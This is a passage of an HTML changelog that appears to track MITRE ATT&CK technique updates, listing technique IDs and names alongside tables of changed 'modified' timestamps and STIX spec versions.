black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 18:38:49.558000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1584.005] Compromise Infrastructure: Botnet</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:02.197000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.669000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1036.009] Masquerading: Break Process Trees</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:32:49.027000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.012] Masquerading: Browser Fingerprint</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:37:12.322000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr></tbody></table></details><hr><h4>[T1217] Browser Information Discovery</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:50.561000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1185] Browser Session Hijacking</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:48.383000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1110] Brute Force</h4><p><b>Current version</b>: 2.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:12.218000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1612] Build Image on Host</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:56:51.027000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.662000+00:00</td></tr></tbody></table></details><hr><h4>[T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:51:31.419000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.003] System Binary Proxy Execution: CMSTP</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:37:18.154000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.631000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.012] Hijack Execution Flow: COR_PROFILER</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 18:58:17.752000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.727000+00:00</td></tr></tbody></table></details><hr><h4>[T1070.003] Indicator Removal: Clear Command History</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:27:09.604000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.627000+00:00</td></tr></tbody></table></details><hr><h4>[T1685.006] Disable or Modify Tools: Clear Linux or Mac System Logs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:41:39.190000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1070.008] Indicator Removal: Clear Mailbox Data</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:27:22.074000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1070.007] Indicator Removal: Clear Network Connection History and Configurations</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 19:27:07.242000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.627000+00:00</td></tr></tbody></table></details><hr><h4>[T1070.009] Indicator Removal: Clear Persistence</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:28:24.292000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1685.005] Disable or Modify Tools: Clear Windows Event Logs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:41:59.512000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr></tbody></table></details><hr><h4>[T1127.002] Trusted Developer Utilities Proxy Execution: ClickOnce</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:45:37.624000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1592.004] Gather Victim Host Information: Client Configurations</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:58.431000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1115] Clipboard Data</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:36.079000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1059.009] Command and Scripting Interpreter: Cloud API</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:58:32.612000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1585.003] Establish Accounts: Cloud Accounts</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:06.502000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1078.004] Valid Accounts: Cloud Accounts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:51:18.773000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1586.003] Compromise Accounts: Cloud Accounts</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:41.215000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1651] Cloud Administration Command</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:59:13.081000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.721000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1686.001] Disable or Modify System Firewall: Cloud Firewall</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:38:27.348000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1580] Cloud Infrastructure Discovery</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:49.479000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1552.005] Unsecured Credentials: Cloud Instance Metadata API</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:27.965000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1555.006] Credentials from Password Stores: Cloud Secrets Management Stores</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 22:03:00.834000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1526] Cloud Service Discovery</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:17:35.798000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1619] Cloud Storage Object Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:03.853000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.685000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1213.003] Data from Information Repositories: Code Repositories</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:25.081000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1593.003] Search Open Websites/Domains: Code Repositories</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:56.790000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1553.002] Subvert Trust Controls: Code Signing</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.093000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T1553.006] Subvert Trust Controls: Code Signing Policy Modification</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.034000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.010] Obfuscated Files or Information: Command Obfuscation</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:16:39.249000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.718000+00:00</td></tr></tbody></table></details><hr><h4>[T1059] Command and Scripting Interpreter</h4><p><b>Current version</b>: 2.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-27 20:03:38.098000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.004] Obfuscated Files or Information: Compile After Delivery</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:16:52.765000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.001] System Binary Proxy Execution: Compiled HTML File</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:37:42.151000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1542.002] Pre-OS Boot: Component Firmware</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 